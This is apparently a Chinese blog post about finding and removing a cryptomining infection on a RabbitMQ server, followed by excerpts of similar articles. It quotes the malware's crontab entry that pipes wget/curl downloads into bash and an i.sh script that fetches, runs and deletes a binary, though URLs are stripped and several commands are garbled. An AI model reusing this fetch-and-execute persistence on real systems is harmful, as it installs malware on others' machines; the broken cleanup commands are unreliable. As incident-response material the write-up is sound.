事情是這樣的,發現 rabbitmq 服務響應非常慢,可以說是基本不響應、無法提供服務了。這時就去伺服器上面檢視,發現 cpu 的資源被乙個叫做uxyhf8的程式嚴重占用。
看到 cpu 飆公升太高,發現這個程式也不是自己所知道的任何乙個程式,所以就懷疑中挖礦病毒了。首先把這個程式給kill掉,只能先kill掉了,不然卡的都快無法操作了。
# 34534:挖礦程式的 pid
$ kill -9 34534
iufh8f(事後經過測試,新程序出現的時間在幾分鐘到幾十分鐘變化),這時就想到是不是有定時任務,檢視定時任務:
$ crontab -e
10 * * * * (wget -qo- -u- || curl -fskl -a- || wget -qo- -u- || curl -fskl -a- || wget -qo- -u- || curl -fskl -a- || wget -qo- -u- || curl -fskl -a- || wget -qo- -u- || curl -fskl -a- )|bash
i.sh指令碼內容多變,大致如一下:
# i.sh 指令碼的內容是
exec &>/dev/null
if ! ps -p $(< /tmp/.x11-lock); then
x=./.y
wget -qu- -m) -o$x;chmod 777 $x;$x;rm -f $x
fi
/etc/cron.d目錄下、/var/spool/cron/目錄下。至此結束(自認為結束)。
在第一次處理的結果上發現過段時間,挖礦程式又出現了。這是知道問題沒有那麼簡單。可能還殘留病毒檔案。最後找到幾個病毒程式,如下:
/usr/lib/systemd/systemd-logind
/sbin/agetty
/sbin/agetty
$ ps aux | grep -v grep | grep "agetty"
root 26432 0.0 0.0 110044 824 tty1 ss+ 15:15 0:00 /sbin/agetty --noclear tty1 linux
root 26434 0.0 0.0 110044 784 ttys0 ss+ 15:15 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttys0 vt220
$ ps aux | grep -v grep | grep "systemd-logind"
root 502 0.0 0.0 24204 1680 ? ss 2018 0:52 /usr/lib/systemd/systemd-logind
殺死病毒程式,一定要多執行幾次,我執行了好幾次才殺掉。
$ ps aux | grep -v grep | grep "agetty" | awk '' | xargs kill -9 && ps aux | grep -v grep | grep "systemd-logind" | awk '' | xargs kill -9伺服器被植入挖礦病毒的處理
伺服器被植入挖礦病毒的處理 故障描述 一台伺服器一直在向外傳送網路包,導致該網段網路擁堵。同時我司的一台伺服器也出現了同樣的情況,不斷往外發包,導致網段擁堵 經過排查,發現該機器被植入挖礦病毒,部分偽裝成系統檔案,占用cpu及網路,病毒程序分別為 system wipefs ps cranberry...
伺服器處理挖礦
使用top查詢程序 某個程序占用cpu或記憶體過分,查之 如 進入目錄,分析裡面的檔案,進入 etc下,分析如update類似的檔案。處理過程 chattr i 檔案 rm rf 檔案 如果是root使用者感染的病毒 vim etc selinux config 將selinux disabled改...
雲伺服器的挖礦病毒。
朋友的阿里雲放著沒用了,我就借來打算放兩個小東西上去,結果一上去看到cpu 100 我的天,如果這是個windows,我就要開始懷疑他是不用這個來看愛情片。當在cpu爆滿。使用top命名會發現有若干個程序長期占用及高的cpu,那麼問題就出在這些程序上,想都不用想kill 9 pid瞬間消滅!垃圾病毒...